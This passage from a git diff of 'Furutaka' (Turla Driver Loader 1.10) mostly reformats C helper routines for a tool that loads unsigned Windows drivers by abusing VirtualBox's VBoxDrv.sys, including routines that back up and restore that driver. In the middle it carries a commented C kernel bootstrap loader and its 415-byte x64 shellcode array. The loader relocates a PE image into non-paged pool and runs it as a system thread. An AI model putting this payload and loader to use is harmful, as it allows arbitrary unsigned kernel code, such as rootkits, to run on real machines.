software installed, conflicts are possible"), + g_ConsoleOutput, TRUE); + } - uResult = TDLProcessCommandLine(GetCommandLine()); + uResult = TDLProcessCommandLine(GetCommandLine()); - } while (cond); + } while (cond); - InterlockedDecrement((PLONG)&g_lApplicationInstances); - ExitProcess(uResult); + InterlockedDecrement((PLONG)&g_lApplicationInstances); + ExitProcess(uResult); } diff --git a/Source/Furutaka/resource.rc b/Source/Furutaka/resource.rc index b664ad48057455329fd15ddf7ac662ce8eb3e77a..351f442c7176a2a4729c40bed9b8f6bc4cff6863 100644 GIT binary patch delta 310 zcmeyQc1&kO2>WC=fgh8(n3w3fGUPF&GvqL2G88jpFeor+FoXg{G8sx3QW;W!{9qs} z5zH%Q(43qoBs}>6a{;R>gC9fa)a{>QrvsBoiz%3>Ki%LTn delta 110 zcmX@6^GR((2>awYf*U4p;ws}bV9;RzVZ+Jh+?oj9=6vqijEn}Gxq00gfuedqHF`ib niF^+k%{DvpN23agPrfD~1jJK-Ie_lfanew); + PIMAGE_DOS_HEADER dosh = (PIMAGE_DOS_HEADER)Image; + PIMAGE_FILE_HEADER fileh = + (PIMAGE_FILE_HEADER)(Image + sizeof(DWORD) + dosh->e_lfanew); - PIMAGE_OPTIONAL_HEADER popth = - (PIMAGE_OPTIONAL_HEADER)((PBYTE)fileh + sizeof(IMAGE_FILE_HEADER)); + PIMAGE_OPTIONAL_HEADER popth = + (PIMAGE_OPTIONAL_HEADER)((PBYTE)fileh + sizeof(IMAGE_FILE_HEADER)); - ULONG isz = popth->SizeOfImage; - HANDLE th; + ULONG isz = popth->SizeOfImage; + HANDLE th; - PIMAGE_BASE_RELOCATION rel; - DWORD_PTR delta; - LPWORD chains; - DWORD c, p, rsz; + PIMAGE_BASE_RELOCATION rel; + DWORD_PTR delta; + LPWORD chains; + DWORD c, p, rsz; - OBJECT_ATTRIBUTES attr; + OBJECT_ATTRIBUTES attr; - exbuffer = (ULONG_PTR)ExAllocatePoolWithTag( - NonPagedPool, isz + PAGE_SIZE, 'SldT') + PAGE_SIZE; - exbuffer &= ~(PAGE_SIZE - 1); + exbuffer = (ULONG_PTR)ExAllocatePoolWithTag( + NonPagedPool, isz + PAGE_SIZE, 'SldT') + PAGE_SIZE; + exbuffer &= ~(PAGE_SIZE - 1); - if (popth->NumberOfRvaAndSizes > IMAGE_DIRECTORY_ENTRY_BASERELOC) - if (popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress != 0) - { - rel = (PIMAGE_BASE_RELOCATION)((PBYTE)Image + - popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress); + if (popth->NumberOfRvaAndSizes > IMAGE_DIRECTORY_ENTRY_BASERELOC) + if (popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress != 0) + { + rel = (PIMAGE_BASE_RELOCATION)((PBYTE)Image + + popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress); - rsz = popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size; - delta = (DWORD_PTR)exbuffer - popth->ImageBase; - c = 0; + rsz = popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size; + delta = (DWORD_PTR)exbuffer - popth->ImageBase; + c = 0; - while (c < rsz) { - p = sizeof(IMAGE_BASE_RELOCATION); - chains = (LPWORD)((PBYTE)rel + p); + while (c < rsz) { + p = sizeof(IMAGE_BASE_RELOCATION); + chains = (LPWORD)((PBYTE)rel + p); - while (p < rel->SizeOfBlock) { + while (p < rel->SizeOfBlock) { - switch (*chains >> 12) { - case IMAGE_REL_BASED_HIGHLOW: - *(LPDWORD)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += (DWORD)delta; - break; - case IMAGE_REL_BASED_DIR64: - *(PULONGLONG)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += delta; - break; - } + switch (*chains >> 12) { + case IMAGE_REL_BASED_HIGHLOW: + *(LPDWORD)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += (DWORD)delta; + break; + case IMAGE_REL_BASED_DIR64: + *(PULONGLONG)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += delta; + break; + } - chains++; - p += sizeof(WORD); - } + chains++; + p += sizeof(WORD); + } - c += rel->SizeOfBlock; - rel = (PIMAGE_BASE_RELOCATION)((PBYTE)rel + rel->SizeOfBlock); - } - } + c += rel->SizeOfBlock; + rel = (PIMAGE_BASE_RELOCATION)((PBYTE)rel + rel->SizeOfBlock); + } + } - isz >>= 3; - for (pos = 0; pos < isz; pos++) - ((PULONG64)exbuffer)[pos] = ((PULONG64)Image)[pos]; + isz >>= 3; + for (pos = 0; pos < isz; pos++) + ((PULONG64)exbuffer)[pos] = ((PULONG64)Image)[pos]; - InitializeObjectAttributes(&attr, NULL, OBJ_KERNEL_HANDLE, NULL, NULL); - PsCreateSystemThread(&th, THREAD_ALL_ACCESS, &attr, NULL, NULL, - (PKSTART_ROUTINE)(exbuffer + popth->AddressOfEntryPoint), NULL); + InitializeObjectAttributes(&attr, NULL, OBJ_KERNEL_HANDLE, NULL, NULL); + PsCreateSystemThread(&th, THREAD_ALL_ACCESS, &attr, NULL, NULL, + (PKSTART_ROUTINE)(exbuffer + popth->AddressOfEntryPoint), NULL); } */ static const unsigned char TDLBootstrapLoader_code[415] = { - 0x40, 0x53, 0x56, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x48, 0x83, 0xEC, 0x70, 0x4C, 0x8B, 0xE2, - 0x4C, 0x89, 0xBC, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xC9, 0x48, 0x8D, 0x1D, 0xDE, 0xFF, - 0xFF, 0xFF, 0x48, 0x81, 0xC3, 0x00, 0x02, 0x00, 0x00, 0x33, 0xC9, 0x41, 0xB8, 0x54, 0x64, 0x6C, - 0x53, 0x4C, 0x63, 0x73, 0x3C, 0x4C, 0x03, 0xF3, 0x45, 0x8B, 0x7E, 0x50, 0x41, 0x8D, 0x97, 0x00, - 0x10, 0x00, 0x00, 0x41, 0xFF, 0xD1, 0x45, 0x33, 0xED, 0x48, 0x8D, 0xB0, 0x00, 0x10, 0x00, 0x00, - 0x48, 0x81, 0xE6, 0x00, 0xF0, 0xFF, 0xFF, 0x41, 0x83, 0xBE, 0x84, 0x00, 0x00, 0x00, 0x05, 0x0F, - 0x86, 0xAB, 0x00, 0x00, 0x00, 0x41, 0x8B, 0x8E, 0xB0, 0x00, 0x00, 0x00, 0x85, 0xC9, 0x0F, 0x84, - 0x9C, 0x00, 0x00, 0x00, 0x48, 0x89, 0xAC, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x4C, 0x8D, 0x04, 0x0B, - 0x41, 0x8B, 0xAE, 0xB4, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xDE, 0x4D, 0x2B, 0x5E, 0x30, 0x48, 0x89, - 0xBC, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x41, 0x8B, 0xFD, 0x85, 0xED, 0x74, 0x63, 0x0F, 0x1F, 0x00, - 0x41, 0xB9, 0x08, 0x00, 0x00, 0x00, 0x4D, 0x8D, 0x50, 0x08, 0x45, 0x39, 0x48, 0x04, 0x76, 0x43, - 0x41, 0x0F, 0xB7, 0x02, 0x8B, 0xC8, 0xC1, 0xE9, 0x0C, 0x83, 0xF9, 0x03, 0x74, 0x17, 0x83, 0xF9, - 0x0A, 0x75, 0x22, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, 0x03, 0x4C, - 0x01, 0x1C, 0x0A, 0xEB, 0x10, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, - 0x03, 0x44, 0x01, 0x1C, 0x0A, 0x49, 0x83, 0xC2, 0x02, 0x41, 0x83, 0xC1, 0x02, 0x45, 0x3B, 0x48, - 0x04, 0x72, 0xBD, 0x41, 0x8B, 0x40, 0x04, 0x03, 0xF8, 0x4C, 0x03, 0xC0, 0x3B, 0xFD, 0x72, 0xA0, - 0x48, 0x8B, 0xAC, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xBC, 0x24, 0xB0, 0x00, 0x00, 0x00, - 0x49, 0x8B, 0xD7, 0x4C, 0x8B, 0xBC, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x48, 0xC1, 0xEA, 0x03, 0x48, - 0x85, 0xD2, 0x74, 0x1D, 0x48, 0x8B, 0xCE, 0x48, 0x2B, 0xDE, 0x66, 0x0F, 0x1F, 0x44, 0x00, 0x00, - 0x48, 0x8B, 0x04, 0x0B, 0x48, 0x89, 0x01, 0x48, 0x8D, 0x49, 0x08, 0x48, 0x83, 0xEA, 0x01, 0x75, - 0xEF, 0x0F, 0x57, 0xC0, 0xC7, 0x44, 0x24, 0x40, 0x30, 0x00, 0x00, 0x00, 0xF3, 0x0F, 0x7F, 0x44, - 0x24, 0x60, 0x4C, 0x89, 0x6C, 0x24, 0x48, 0x4C, 0x8D, 0x44, 0x24, 0x40, 0xC7, 0x44, 0x24, 0x58, - 0x00, 0x02, 0x00, 0x00, 0x48, 0x8D, 0x8C, 0x24, 0xA0, 0x00, 0x00, 0x00, 0x4C, 0x89, 0x6C, 0x24, - 0x50, 0x45, 0x33, 0xC9, 0x41, 0x8B, 0x46, 0x28, 0xBA, 0xFF, 0xFF, 0x1F, 0x00, 0x48, 0x03, 0xC6, - 0x4C, 0x89, 0x6C, 0x24, 0x30, 0x48, 0x89, 0x44, 0x24, 0x28, 0x4C, 0x89, 0x6C, 0x24, 0x20, 0x41, - 0xFF, 0xD4, 0x48, 0x83, 0xC4, 0x70, 0x41, 0x5E, 0x41, 0x5D, 0x41, 0x5C, 0x5E, 0x5B, 0xC3 + 0x40, 0x53, 0x56, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x48, 0x83, 0xEC, 0x70, 0x4C, 0x8B, 0xE2, + 0x4C, 0x89, 0xBC, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xC9, 0x48, 0x8D, 0x1D, 0xDE, 0xFF, + 0xFF, 0xFF, 0x48, 0x81, 0xC3, 0x00, 0x02, 0x00, 0x00, 0x33, 0xC9, 0x41, 0xB8, 0x54, 0x64, 0x6C, + 0x53, 0x4C, 0x63, 0x73, 0x3C, 0x4C, 0x03, 0xF3, 0x45, 0x8B, 0x7E, 0x50, 0x41, 0x8D, 0x97, 0x00, + 0x10, 0x00, 0x00, 0x41, 0xFF, 0xD1, 0x45, 0x33, 0xED, 0x48, 0x8D, 0xB0, 0x00, 0x10, 0x00, 0x00, + 0x48, 0x81, 0xE6, 0x00, 0xF0, 0xFF, 0xFF, 0x41, 0x83, 0xBE, 0x84, 0x00, 0x00, 0x00, 0x05, 0x0F, + 0x86, 0xAB, 0x00, 0x00, 0x00, 0x41, 0x8B, 0x8E, 0xB0, 0x00, 0x00, 0x00, 0x85, 0xC9, 0x0F, 0x84, + 0x9C, 0x00, 0x00, 0x00, 0x48, 0x89, 0xAC, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x4C, 0x8D, 0x04, 0x0B, + 0x41, 0x8B, 0xAE, 0xB4, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xDE, 0x4D, 0x2B, 0x5E, 0x30, 0x48, 0x89, + 0xBC, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x41, 0x8B, 0xFD, 0x85, 0xED, 0x74, 0x63, 0x0F, 0x1F, 0x00, + 0x41, 0xB9, 0x08, 0x00, 0x00, 0x00, 0x4D, 0x8D, 0x50, 0x08, 0x45, 0x39, 0x48, 0x04, 0x76, 0x43, + 0x41, 0x0F, 0xB7, 0x02, 0x8B, 0xC8, 0xC1, 0xE9, 0x0C, 0x83, 0xF9, 0x03, 0x74, 0x17, 0x83, 0xF9, + 0x0A, 0x75, 0x22, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, 0x03, 0x4C, + 0x01, 0x1C, 0x0A, 0xEB, 0x10, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, + 0x03, 0x44, 0x01, 0x1C, 0x0A, 0x49, 0x83, 0xC2, 0x02, 0x41, 0x83, 0xC1, 0x02, 0x45, 0x3B, 0x48, + 0x04, 0x72, 0xBD, 0x41, 0x8B, 0x40, 0x04, 0x03, 0xF8, 0x4C, 0x03, 0xC0, 0x3B, 0xFD, 0x72, 0xA0, + 0x48, 0x8B, 0xAC, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xBC, 0x24, 0xB0, 0x00, 0x00, 0x00, + 0x49, 0x8B, 0xD7, 0x4C, 0x8B, 0xBC, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x48, 0xC1, 0xEA, 0x03, 0x48, + 0x85, 0xD2, 0x74, 0x1D, 0x48, 0x8B, 0xCE, 0x48, 0x2B, 0xDE, 0x66, 0x0F, 0x1F, 0x44, 0x00, 0x00, + 0x48, 0x8B, 0x04, 0x0B, 0x48, 0x89, 0x01, 0x48, 0x8D, 0x49, 0x08, 0x48, 0x83, 0xEA, 0x01, 0x75, + 0xEF, 0x0F, 0x57, 0xC0, 0xC7, 0x44, 0x24, 0x40, 0x30, 0x00, 0x00, 0x00, 0xF3, 0x0F, 0x7F, 0x44, + 0x24, 0x60, 0x4C, 0x89, 0x6C, 0x24, 0x48, 0x4C, 0x8D, 0x44, 0x24, 0x40, 0xC7, 0x44, 0x24, 0x58, + 0x00, 0x02, 0x00, 0x00, 0x48, 0x8D, 0x8C, 0x24, 0xA0, 0x00, 0x00, 0x00, 0x4C, 0x89, 0x6C, 0x24, + 0x50, 0x45, 0x33, 0xC9, 0x41, 0x8B, 0x46, 0x28, 0xBA, 0xFF, 0xFF, 0x1F, 0x00, 0x48, 0x03, 0xC6, + 0x4C, 0x89, 0x6C, 0x24, 0x30, 0x48, 0x89, 0x44, 0x24, 0x28, 0x4C, 0x89, 0x6C, 0x24, 0x20, 0x41, + 0xFF, 0xD4, 0x48, 0x83, 0xC4, 0x70, 0x41, 0x5E, 0x41, 0x5D, 0x41, 0x5C, 0x5E, 0x5B, 0xC3 }; diff --git a/Source/Furutaka/sup.c b/Source/Furutaka/sup.c index b1d4b91..c23db86 100644 --- a/Source/Furutaka/sup.c +++ b/Source/Furutaka/sup.c @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2016 +* (C) COPYRIGHT AUTHORS, 2016 - 2017 * * TITLE: SUP.C * -* VERSION: 1.00 +* VERSION: 1.10 * -* DATE: 01 Feb 2016 +* DATE: 17 Apr 2017 * * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED @@ -25,43 +25,43 @@ * */ PVOID supGetSystemInfo( - _In_ SYSTEM_INFORMATION_CLASS InfoClass - ) + _In_ SYSTEM_INFORMATION_CLASS InfoClass +) { - INT c = 0; - PVOID Buffer = NULL; - ULONG Size = 0x1000; - NTSTATUS status; - ULONG memIO; - PVOID hHeap = NtCurrentPeb()->ProcessHeap; + INT c = 0; + PVOID Buffer = NULL; + ULONG Size = 0x1000; + NTSTATUS status; + ULONG memIO; + PVOID hHeap = NtCurrentPeb()->ProcessHeap; - do { - Buffer = RtlAllocateHeap(hHeap, HEAP_ZERO_MEMORY, (SIZE_T)Size); - if (Buffer != NULL) { - status = NtQuerySystemInformation(InfoClass, Buffer, Size, &memIO); - } - else { - return NULL; - } - if (status == STATUS_INFO_LENGTH_MISMATCH) { - RtlFreeHeap(hHeap, 0, Buffer); - Size *= 2; - c++; - if (c > 100) { - status = STATUS_SECRET_TOO_LONG; - break; - } - } - } while (status == STATUS_INFO_LENGTH_MISMATCH); + do { + Buffer = RtlAllocateHeap(hHeap, HEAP_ZERO_MEMORY, (SIZE_T)Size); + if (Buffer != NULL) { + status = NtQuerySystemInformation(InfoClass, Buffer, Size, &memIO); + } + else { + return NULL; + } + if (status == STATUS_INFO_LENGTH_MISMATCH) { + RtlFreeHeap(hHeap, 0, Buffer); + Size *= 2; + c++; + if (c > 100) { + status = STATUS_SECRET_TOO_LONG; + break; + } + } + } while (status == STATUS_INFO_LENGTH_MISMATCH); - if (NT_SUCCESS(status)) { - return Buffer; - } + if (NT_SUCCESS(status)) { + return Buffer; + } - if (Buffer) { - RtlFreeHeap(hHeap, 0, Buffer); - } - return NULL; + if (Buffer) { + RtlFreeHeap(hHeap, 0, Buffer); + } + return NULL; } /* @@ -73,19 +73,19 @@ PVOID supGetSystemInfo( * */ ULONG_PTR supGetNtOsBase( - VOID - ) + VOID +) { - PRTL_PROCESS_MODULES miSpace; - ULONG_PTR NtOsBase = 0; + PRTL_PROCESS_MODULES miSpace; + ULONG_PTR NtOsBase = 0; - miSpace = supGetSystemInfo(SystemModuleInformation); - while (miSpace != NULL) { - NtOsBase = (ULONG_PTR)miSpace->Modules[0].ImageBase; - RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, miSpace); - break; - } - return NtOsBase; + miSpace = supGetSystemInfo(SystemModuleInformation); + while (miSpace != NULL) { + NtOsBase = (ULONG_PTR)miSpace->Modules[0].ImageBase; + RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, miSpace); + break; + } + return NtOsBase; } /* @@ -97,34 +97,34 @@ ULONG_PTR supGetNtOsBase( * */ PBYTE supQueryResourceData( - _In_ ULONG_PTR ResourceId, - _In_ PVOID DllHandle, - _In_ PULONG DataSize - ) + _In_ ULONG_PTR ResourceId, + _In_ PVOID DllHandle, + _In_ PULONG DataSize +) { - NTSTATUS status; - ULONG_PTR IdPath[3]; - IMAGE_RESOURCE_DATA_ENTRY *DataEntry; - PBYTE Data = NULL; - ULONG SizeOfData = 0; + NTSTATUS status; + ULONG_PTR IdPath[3]; + IMAGE_RESOURCE_DATA_ENTRY *DataEntry; + PBYTE Data = NULL; + ULONG SizeOfData = 0; - if (DllHandle != NULL) { + if (DllHandle != NULL) { - IdPath[0] = (ULONG_PTR)RT_RCDATA; //type - IdPath[1] = ResourceId; //id - IdPath[2] = 0; //lang + IdPath[0] = (ULONG_PTR)RT_RCDATA; //type + IdPath[1] = ResourceId; //id + IdPath[2] = 0; //lang - status = LdrFindResource_U(DllHandle, (ULONG_PTR*)&IdPath, 3, &DataEntry); - if (NT_SUCCESS(status)) { - status = LdrAccessResource(DllHandle, DataEntry, &Data, &SizeOfData); - if (NT_SUCCESS(status)) { - if (DataSize) { - *DataSize = SizeOfData; - } - } - } - } - return Data; + status = LdrFindResource_U(DllHandle, (ULONG_PTR*)&IdPath, 3, &DataEntry); + if (NT_SUCCESS(status)) { + status = LdrAccessResource(DllHandle, DataEntry, &Data, &SizeOfData); + if (NT_SUCCESS(status)) { + if (DataSize) { + *DataSize = SizeOfData; + } + } + } + } + return Data; } /* @@ -136,39 +136,39 @@ PBYTE supQueryResourceData( * */ BOOL supBackupVBoxDrv( - _In_ BOOL bRestore - ) + _In_ BOOL bRestore +) { - BOOL bResult = FALSE; - WCHAR szOldDriverName[MAX_PATH * 2]; - WCHAR szNewDriverName[MAX_PATH * 2]; - WCHAR szDriverDirName[MAX_PATH * 2]; + BOOL bResult = FALSE; + WCHAR szOldDriverName[MAX_PATH * 2]; + WCHAR szNewDriverName[MAX_PATH * 2]; + WCHAR szDriverDirName[MAX_PATH * 2]; - if (!GetSystemDirectory(szDriverDirName, MAX_PATH)) { - return FALSE; - } + if (!GetSystemDirectory(szDriverDirName, MAX_PATH)) { + return FALSE; + } - _strcat(szDriverDirName, TEXT("\\drivers\\")); + _strcat(szDriverDirName, TEXT("\\drivers\\")); - if (bRestore) { - _strcpy(szOldDriverName, szDriverDirName); - _strcat(szOldDriverName, TEXT("VBoxDrv.backup")); - if (PathFileExists(szOldDriverName)) { - _strcpy(szNewDriverName, szDriverDirName); - _strcat(szNewDriverName, TEXT("VBoxDrv.sys")); - bResult = MoveFileEx(szOldDriverName, szNewDriverName, - MOVEFILE_REPLACE_EXISTING | MOVEFILE_WRITE_THROUGH); - } - } - else { - _strcpy(szOldDriverName, szDriverDirName); - _strcat(szOldDriverName, TEXT("VBoxDrv.sys")); - _strcpy(szNewDriverName, szDriverDirName); - _strcat(szNewDriverName, TEXT("VBoxDrv.backup")); - bResult = MoveFileEx(szOldDriverName, szNewDriverName, - MOVEFILE_REPLACE_EXISTING | MOVEFILE_WRITE_THROUGH); - } - return bResult; + if (bRestore) { + _strcpy(szOldDriverName, szDriverDirName); + _strcat(szOldDriverName, TEXT("VBoxDrv.backup")); + if (PathFileExists(szOldDriverName)) { + _strcpy(szNewDriverName, szDriverDirName); + _strcat(szNewDriverName, TEXT("VBoxDrv.sys")); + bResult = MoveFileEx(szOldDriverName, szNewDriverName, + MOVEFILE_REPLACE_EXISTING | MOVEFILE_WRITE_THROUGH); + } + } + else { + _strcpy(szOldDriverName, szDriverDirName); + _strcat(szOldDriverName, TEXT("VBoxDrv.sys")); + _strcpy(szNewDriverName, szDriverDirName); + _strcat(szNewDriverName, TEXT("VBoxDrv.backup")); + bResult = MoveFileEx(szOldDriverName, szNewDriverName, + MOVEFILE_REPLACE_EXISTING | MOVEFILE_WRITE_THROUGH); + } + return bResult; } /* @@ -180,93 +180,93 @@ BOOL supBackupVBoxDrv( * */ SIZE_T supWriteBufferToFile( - _In_ PWSTR lpFileName, - _In_ PVOID Buffer, - _In_ SIZE_T Size, - _In_ BOOL Flush, - _In_ BOOL Append - ) + _In_ PWSTR lpFileName, + _In_ PVOID Buffer, + _In_ SIZE_T Size, + _In_ BOOL Flush, + _In_ BOOL Append +) { - NTSTATUS Status; - DWORD dwFlag; - HANDLE hFile = NULL; - OBJECT_ATTRIBUTES attr; - UNICODE_STRING NtFileName; - IO_STATUS_BLOCK IoStatus; - LARGE_INTEGER Position; - ACCESS_MASK DesiredAccess; - PLARGE_INTEGER pPosition = NULL; - ULONG_PTR nBlocks, BlockIndex; - ULONG BlockSize, RemainingSize; - PBYTE ptr = (PBYTE)Buffer; - SIZE_T BytesWritten = 0; + NTSTATUS Status; + DWORD dwFlag; + HANDLE hFile = NULL; + OBJECT_ATTRIBUTES attr; + UNICODE_STRING NtFileName; + IO_STATUS_BLOCK IoStatus; + LARGE_INTEGER Position; + ACCESS_MASK DesiredAccess; + PLARGE_INTEGER pPosition = NULL; + ULONG_PTR nBlocks, BlockIndex; + ULONG BlockSize, RemainingSize; + PBYTE ptr = (PBYTE)Buffer; + SIZE_T BytesWritten = 0; - if (RtlDosPathNameToNtPathName_U(lpFileName, &NtFileName, NULL, NULL) == FALSE) - return 0; + if (RtlDosPathNameToNtPathName_U(lpFileName, &NtFileName, NULL, NULL) == FALSE) + return 0; - DesiredAccess = FILE_WRITE_ACCESS | SYNCHRONIZE; - dwFlag = FILE_OVERWRITE_IF; + DesiredAccess = FILE_WRITE_ACCESS | SYNCHRONIZE; + dwFlag = FILE_OVERWRITE_IF; - if (Append == TRUE) { - DesiredAccess |= FILE_READ_ACCESS; - dwFlag = FILE_OPEN_IF; - } + if (Append != FALSE) { + DesiredAccess |= FILE_READ_ACCESS; + dwFlag = FILE_OPEN_IF; + } - InitializeObjectAttributes(&attr, &NtFileName, OBJ_CASE_INSENSITIVE, 0, NULL); + InitializeObjectAttributes(&attr, &NtFileName, OBJ_CASE_INSENSITIVE, 0, NULL); - __try { - Status = NtCreateFile(&hFile, DesiredAccess, &attr, - &IoStatus, NULL, FILE_ATTRIBUTE_NORMAL, 0, dwFlag, - FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE, NULL, 0); + __try { + Status = NtCreateFile(&hFile, DesiredAccess, &attr, + &IoStatus, NULL, FILE_ATTRIBUTE_NORMAL, 0, dwFlag, + FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE, NULL, 0); - if (!NT_SUCCESS(Status)) - __leave; + if (!NT_SUCCESS(Status)) + __leave; - pPosition = NULL; + pPosition = NULL; - if (Append == TRUE) { - Position.LowPart = FILE_WRITE_TO_END_OF_FILE; - Position.HighPart = -1; - pPosition = &Position; - } + if (Append != FALSE) { + Position.LowPart = FILE_WRITE_TO_END_OF_FILE; + Position.HighPart = -1; + pPosition = &Position; + } - if (Size < 0x80000000) { - BlockSize = (ULONG)Size; - Status = NtWriteFile(hFile, 0, NULL, NULL, &IoStatus, ptr, BlockSize, pPosition, NULL); - if (!NT_SUCCESS(Status)) - __leave; + if (Size < 0x80000000) { + BlockSize = (ULONG)Size; + Status = NtWriteFile(hFile, 0, NULL, NULL, &IoStatus, ptr, BlockSize, pPosition, NULL); + if (!NT_SUCCESS(Status)) + __leave; - BytesWritten += IoStatus.Information; - } - else { - BlockSize = 0x7FFFFFFF; - nBlocks = (Size / BlockSize); - for (BlockIndex = 0; BlockIndex < nBlocks; BlockIndex++) { + BytesWritten += IoStatus.Information; + } + else { + BlockSize = 0x7FFFFFFF; + nBlocks = (Size / BlockSize); + for (BlockIndex = 0; BlockIndex < nBlocks; BlockIndex++) { - Status = NtWriteFile(hFile, 0, NULL, NULL, &IoStatus, ptr, BlockSize, pPosition, NULL); - if (!NT_SUCCESS(Status)) - __leave; + Status = NtWriteFile(hFile, 0, NULL, NULL, &IoStatus, ptr, BlockSize, pPosition, NULL); + if (!NT_SUCCESS(Status)) + __leave; - ptr += BlockSize; - BytesWritten += IoStatus.Information; - } - RemainingSize = Size % BlockSize; - if (RemainingSize != 0) { - Status = NtWriteFile(hFile, 0, NULL, NULL, &IoStatus, ptr, RemainingSize, pPosition, NULL); - if (!NT_SUCCESS(Status)) - __leave; - BytesWritten += IoStatus.Information; - } - } - } - __finally { - if (hFile != NULL) { - if (Flush == TRUE) NtFlushBuffersFile(hFile, &IoStatus); - NtClose(hFile); - } - RtlFreeUnicodeString(&NtFileName); - } - return BytesWritten; + ptr += BlockSize; + BytesWritten += IoStatus.Information; + } + RemainingSize = (ULONG)(Size % BlockSize); + if (RemainingSize != 0) { + Status = NtWriteFile(hFile, 0, NULL, NULL, &IoStatus, ptr, RemainingSize, pPosition, NULL); + if (!NT_SUCCESS(Status)) + __leave; + BytesWritten += IoStatus.Information; + } + } + } + __finally { + if (hFile != NULL) { + if (Flush != FALSE) NtFlushBuffersFile(hFile, &IoStatus); + NtClose(hFile); + } + RtlFreeUnicodeString(&NtFileName); + } + return BytesWritten; } /* @@ -278,30 +278,30 @@ SIZE_T supWriteBufferToFile( * */ NTSTATUS NTAPI supDetectObjectCallback( - _In_ POBJECT_DIRECTORY_INFORMATION Entry, - _In_ PVOID CallbackParam - ) + _In_ POBJECT_DIRECTORY_INFORMATION Entry, + _In_ PVOID CallbackParam +) { - POBJSCANPARAM Param = (POBJSCANPARAM)CallbackParam; + POBJSCANPARAM Param = (POBJSCANPARAM)CallbackParam; - if (Entry == NULL) { - return STATUS_INVALID_PARAMETER_1; - } + if (Entry == NULL) { + return STATUS_INVALID_PARAMETER_1; + } - if (CallbackParam == NULL) { - return STATUS_INVALID_PARAMETER_2; - } + if (CallbackParam == NULL) { + return STATUS_INVALID_PARAMETER_2; + } - if (Param->Buffer == NULL || Param->BufferSize == 0) { - return STATUS_MEMORY_NOT_ALLOCATED; - } + if (Param->Buffer == NULL || Param->BufferSize == 0) { + return STATUS_MEMORY_NOT_ALLOCATED; + } - if (Entry->Name.Buffer) { - if (_strcmpi_w(Entry->Name.Buffer, Param->Buffer) == 0) { - return STATUS_SUCCESS; - } - } - return STATUS_UNSUCCESSFUL; + if (Entry->Name.Buffer) { + if (_strcmpi_w(Entry->Name.Buffer, Param->Buffer) == 0) { + return STATUS_SUCCESS; + } + } + return STATUS_UNSUCCESSFUL; } /* @@ -313,87 +313,87 @@ NTSTATUS NTAPI supDetectObjectCallback( * */ NTSTATUS NTAPI supEnumSystemObjects( - _In_opt_ LPWSTR pwszRootDirectory, - _In_opt_ HANDLE hRootDirectory, - _In_ PENUMOBJECTSCALLBACK CallbackProc, - _In_opt_ PVOID CallbackParam - ) + _In_opt_ LPWSTR pwszRootDirectory, + _In_opt_ HANDLE hRootDirectory, + _In_ PENUMOBJECTSCALLBACK CallbackProc, + _In_opt_ PVOID CallbackParam +) { - BOOL cond = TRUE; - ULONG ctx, rlen; - HANDLE hDirectory = NULL; - NTSTATUS status; - NTSTATUS CallbackStatus; - OBJECT_ATTRIBUTES attr; - UNICODE_STRING sname; + BOOL cond = TRUE; + ULONG ctx, rlen; + HANDLE hDirectory = NULL; + NTSTATUS status; + NTSTATUS CallbackStatus; + OBJECT_ATTRIBUTES attr; + UNICODE_STRING sname; - POBJECT_DIRECTORY_INFORMATION objinf; + POBJECT_DIRECTORY_INFORMATION objinf; - if (CallbackProc == NULL) { - return STATUS_INVALID_PARAMETER_4; - } + if (CallbackProc == NULL) { + return STATUS_INVALID_PARAMETER_4; + } - status = STATUS_UNSUCCESSFUL; + status = STATUS_UNSUCCESSFUL; - __try { + __try { - // We can use root directory. - if (pwszRootDirectory != NULL) { - RtlSecureZeroMemory(&sname, sizeof(sname)); - RtlInitUnicodeString(&sname, pwszRootDirectory); - InitializeObjectAttributes(&attr, &sname, OBJ_CASE_INSENSITIVE, NULL, NULL); - status = NtOpenDirectoryObject(&hDirectory, DIRECTORY_QUERY, &attr); - if (!NT_SUCCESS(status)) { - return status; - } - } - else { - if (hRootDirectory == NULL) { - return STATUS_INVALID_PARAMETER_2; - } - hDirectory = hRootDirectory; - } 